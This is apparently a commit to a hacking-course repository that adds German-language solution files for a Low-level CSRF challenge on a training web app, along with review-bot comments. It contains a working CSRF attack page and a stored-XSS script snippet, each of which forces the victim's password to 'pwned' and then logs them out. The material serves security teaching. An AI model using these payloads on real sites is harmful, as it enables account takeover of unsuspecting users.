hackfahrschule
ChaosCampHacking
Commit 2f145781 authored Aug 20, 2019 by David
added csrf challenge
parent 64cd330d
Changes 2
Lösungen der Challenges/Low/CSRF.html
0 → 100644
<html>
<body>
<h1>
Your account has been hacked!
</h1>
<p>
Well, maybe we will give it back to you :-)
</p>
<script>
var
xhttp
=
new
XMLHttpRequest
();
xhttp
.
open
(
"
GET
"
,
"
http://[IP]/vulnerabilities/csrf/?password_new=pwned&password_conf=pwned&Change=Change
"
,
true
);
xhttp
.
send
();
var
xhttp_logout
=
new
XMLHttpRequest
();
xhttp_logout
.
open
(
"
GET
"
,
"
http://[IP]/logout.php
"
);
xhttp_logout
.
send
();
</script>
</body>
\ No newline at end of file
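Review bot: The file ends at `</body>` with no closing `</html>` and no trailing newline; add both so the page is well-formed. Both request URLs still contain the literal `[IP]` placeholder, and nothing in the file says so; a short HTML comment at the top stating that `[IP]` must be replaced with the address of the training instance, and that this file belongs to the Low-level CSRF challenge, would make it self-explanatory. That comment is also the right place to tell learners why the request is accepted: the password change is a plain GET carrying only `password_new`, `password_conf` and `Change`, with no token and no current password in the URL.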
Lösungen der Challenges/Low/CSRF.md
# Normal
# Hack 1
Dies kann ins Gästebuch (Stored XSS) eingefügt werden:
```
<script>
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://[IP]/vulnerabilities/csrf/?password_new=pwned&password_conf=pwned&Change=Change", true);
xhttp.send();
</script>
```
# Hack 2
Die Datei CSRF.html kann nach der notwendigen Anpassung im File-Upload hochgeladen werden.
\ No newline at end of file
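Review bot: The `# Normal` heading has nothing under it; either describe the intended password change flow there or drop the heading. Under `# Hack 2`, "nach der notwendigen Anpassung" does not say what has to be adjusted; state that it is the `[IP]` placeholder in CSRF.html. As teaching material the solution would benefit from a closing section on the fix this challenge is meant to motivate: the request shown changes state via GET and carries neither an anti-CSRF token nor the current password, so name those as the missing controls. The file also lacks a trailing newline.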